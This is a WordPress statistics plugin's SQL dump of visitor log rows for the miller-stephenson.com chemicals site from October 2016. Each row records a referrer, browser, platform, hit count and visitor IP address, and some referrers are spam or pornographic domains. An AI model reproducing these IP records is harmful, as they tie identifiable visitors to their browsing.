INSERT INTO `wp_statistics_visitor` VALUES (5377, '2016-10-17', 'https://r.search.yahoo.com/_ylt=A0SO80EGOQVYl2UApyJXNyoA;_ylu=X3oDMTEyMTZjbzlhBGNvbG8DZ3ExBHBvcwMyBHZ0aWQDQjE3OTNfMQRzZWMDc3I-/RV=2/RE=1476766086/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fheloxy-61%2f/RK=0/RS=0DD3ChbO84d5pTaQ0UXGS3I.1c4-', 'MSIE', 'Windows', '11.0', '', '63.158.29.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5378, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '64.74.215.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5379, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '149.32.192.34', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5380, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '70.243.68.60', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5381, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '149.32.192.39', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5382, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5383, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5384, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.78.21.92', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5385, '2016-10-17', 'https://www.google.com.au/', 'Chrome', 'Windows', '53.0.2785.143', '', '203.41.172.10', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5386, '2016-10-17', 'https://www.google.com/', 'Safari', 'iPhone', '600.1.4', '', '70.214.104.86', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5387, '2016-10-17', 'https://www.miller-stephenson.com', 'Wget', 'Unknown', '1.11.4', '', '173.242.118.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5388, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.153.132.93', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5389, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiK7sT14-LPAhVJ2yYKHX93BvkQFgg2MAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '65.196.168.11', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5390, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.234.157.219', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5391, '2016-10-17', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '24.115.131.73', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5392, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.140', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5393, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5394, '2016-10-17', 'https://www.bing.com/search?q=miller+silicone+oil&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.251', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5395, '2016-10-17', 'https://www.miller-stephenson.com/chemicals/lubricants/', 'MSIE', 'Windows', '9.0', '', '204.79.180.136', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5396, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '3.0.10', '', '54.234.39.64', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5397, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '174.127.2.70', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5398, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '199.46.249.151', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5399, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '45.53.75.187', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5400, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.77.99.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5401, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5402, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5403, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '206.121.91.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5404, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '47.138.212.52', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5405, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5406, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '27.0.1453', '', '10.191.170.83', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5407, '2016-10-17', 'https://www.miller-stephenson.com/', 'Chrome', 'Android', '27.0.1453', '', '65.57.245.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5408, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '172.58.225.222', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5409, '2016-10-17', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '100.7.14.185', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5410, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '27.120.109.20', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5411, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '47.151.163.137', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5412, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '204.86.209.200', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5413, '2016-10-17', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '50.105.192.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5414, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '162.246.57.93', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5415, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.162.229.81', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5416, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.143.73.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5417, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.147.193.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5418, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.25.162.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5419, '2016-10-17', 'https://www.miller-stephenson.com/miller/pdf/brushes.pdf', 'Chrome', 'Windows', '53.0.2785.143', '', '2.231.46.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5420, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '86.58.131.239', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5421, '2016-10-17', 'https://www.miller-stephenson.com', 'Mechanize', 'Unknown', '2.7.2', '', '54.185.106.253', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5422, '2016-10-17', 'https://www.google.nl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CEQQFjAD&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&ei=R1IFWOndKuHYkwO7ugE&usg=AFQjCNHxnbsHStAmxlL8lgFEVO4LEwORVw', 'MSIE', 'Windows', '11.0', '', '66.102.8.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5423, '2016-10-17', 'https://www.google.nl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CEQQFjAD&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&ei=R1IFWOndKuHYkwO7ugE&usg=AFQjCNHxnbsHStAmxlL8lgFEVO4LEwORVw', 'MSIE', 'Windows', '11.0', '', '66.249.88.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5424, '2016-10-17', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '66.249.88.156', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5425, '2016-10-17', 'https://www.miller-stephenson.com/miller/conformal_coating.html', 'Chrome', 'Windows', '49.0.2623.112', '', '66.226.207.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5426, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '24.37.77.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5427, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiShoie-eLPAhUK6GMKHYKoDHsQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135974163,d.cGc', 'MSIE', 'Windows', '11.0', '', '76.191.72.1', '000', 35, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5428, '2016-10-17', 'https://www.miller-stephenson.com/chemicals/specialty-products/', 'Safari', 'iPad', '10.0', '', '24.193.212.151', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5429, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.245.124.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5430, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.170', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5431, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5432, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.99.147.109', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5433, '2016-10-17', 'https://x-porno.video/', 'Unknown', 'Unknown', 'Unknown', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5434, '2016-10-17', 'https://www.google.com.au/', 'Chrome', 'Android', '53.0.2785.124', '', '49.195.91.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5435, '2016-10-17', 'https://arenanews.com.ua/zdorove/4701-kosmetologicheskiy-salon-eteriya-na-rishelevskoy-30.html', 'Opera', 'Windows', '7.11', '', '37.115.187.108', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5436, '2016-10-17', 'https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjPk6m1_-LPAhWqsVQKHccWDWQQFggbMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fplastic-glass-metal-cleaner%2F&usg=AFQjCNHPWy4BoHCEDieQeBhAcZ0emHXcqw&bvm=bv.135974163,d.cGc', 'MSIE', 'Windows', '11.0', '', '139.130.72.214', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5437, '2016-10-17', 'https://doxyporno.com/', 'Opera', 'Windows', '7.11', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5438, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.183.22.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5439, '2016-10-17', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5440, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '212.129.42.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5441, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.136.187.144', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5442, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwi3soahiuPPAhVM5CYKHZDYCmoQFggoMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox-ts4-thread-sealant%2F&usg=AFQjCNFfsKombewED4-McKHRSiiM8VonGw&sig2=NGiRy06X_egIv5J4H16s_g&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '204.136.203.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5443, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '190.148.87.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5444, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '69.59.67.120', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5445, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.221.1.35', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5446, '2016-10-18', 'https://www.google.co.nz/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwidnLe-jePPAhUkxVQKHfJPDpsQFggmMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-100%2F&usg=AFQjCNHPJSNGJ7C9DJ0T2ATyYgDAnAeKPA&bvm=bv.135974163,d.cGw', 'MSIE', 'Windows', '11.0', '', '203.97.78.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5447, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '209.122.1.217', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5448, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 24, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5449, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.131.22.213', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5450, '2016-10-18', 'https://www.miller-stephenson.com/contact/', 'Safari', 'iPhone', '7.0', '', '199.30.24.27', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5451, '2016-10-18', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&sqi=2&ved=0ahUKEwjNxZCAkuPPAhXn7IMKHfngBfkQjBAIIzAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fsolvents%2F&usg=AFQjCNG9rxN-loo47flpbq4TFJUAtJ1HDg&bvm=bv.135475266,d.amc', 'MSIE', 'Windows', '11.0', '', '184.145.103.203', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5452, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.61.35.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5453, '2016-10-18', 'https://www.miller-stephenson.com/miller/pdf/brushes.pdf', 'Chrome', 'Windows', '53.0.2785.143', '', '2.231.46.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5454, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '176.31.17.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5455, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.139.17.152', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5456, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.164.238.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5457, '2016-10-18', 'https://www.google.com.sg/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjZ3O_1lOPPAhWBK48KHfcmAiUQFggaMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-222N%2C%2520222T.pdf&usg=AFQjCNFZCZI5wPs-cCRMQ4pGlbR-8wR9Tw&bvm=bv.135974163,d.c2I', 'MSIE', 'Windows', '11.0', '', '110.92.98.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5458, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5459, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.29.209.102', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5460, '2016-10-18', 'https://vadimkravtcov.ru/', 'MSIE', 'Windows', '6.0', '', '46.118.118.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5461, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.39.53.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5462, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5463, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '174.52.158.77', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5464, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.103.197.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5465, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5466, '2016-10-18', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '157.127.124.157', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5467, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5468, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.215.112.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5469, '2016-10-18', 'https://www.google.com.au/', 'Chrome', 'Windows', '45.0.2454.101', '', '203.6.77.2', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5470, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '203.6.77.2', '000', 68, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5471, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.124.100.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5472, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Android', '28.0.1500.94', '', '172.58.139.247', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5473, '2016-10-18', 'https://www.google.az/', 'Chrome', 'Windows', '53.0.2785.143', '', '85.132.43.24', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5474, '2016-10-18', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '47.152.136.133', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5475, '2016-10-18', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '65.94.174.119', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5476, '2016-10-18', 'https://g.namaho.com/', 'Chrome', 'Windows', '50.0.2661.102', '', '61.142.41.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5477, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.18.177.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5478, '2016-10-18', 'https://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj74YWAqOPPAhVmr1QKHWEHDBQQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-103%2F&usg=AFQjCNHHHEWLP0h9DHUf-EigXdOgxVzUYQ&bvm=bv.135974163,d.c2I', 'MSIE', 'Windows', '11.0', '', '106.162.231.233', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5479, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.71.203.63', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5480, '2016-10-18', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5481, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '157.55.39.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5482, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '40.77.167.34', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5483, '2016-10-18', 'https://www.google.com.tw/', 'Chrome', 'Windows', '53.0.2785.143', '', '125.227.217.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5484, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '69.162.16.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5485, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.212.128.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5486, '2016-10-18', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.10.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5487, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.125.90.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5488, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '124.176.54.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5489, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5490, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5491, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '39.0.2171.99', '', '66.249.79.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5492, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '39.0.2171.99', '', '66.249.79.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5493, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5494, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '218.255.225.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5495, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '174.136.133.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5496, '2016-10-18', 'https://www.miller-stephenson.com', 'Python-urllib', 'Unknown', '2.7', '', '213.136.80.43', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5497, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.87.146.112', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5498, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.46.191.154', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5499, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.83.120.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5500, '2016-10-18', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.112.23', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5501, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.211.195.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5502, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.222.71.53', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5503, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.172.14.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5504, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.191.22.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5505, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.91.34.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5506, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.88.45.125', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5507, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '58.217.157.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5508, '2016-10-18', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '172.56.42.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5509, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.244.82.84', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5510, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.24.241.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5511, '2016-10-18', 'https://www.google.com/', 'Firefox', 'Windows', '1.0.2', '', '38.133.86.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5512, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.210.27.226', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5513, '2016-10-18', 'https://www.google.com.au/', 'Edge', 'Windows', '13.10586', '', '14.201.221.48', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5514, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '93.160.60.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5515, '2016-10-18', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 3, 0); 
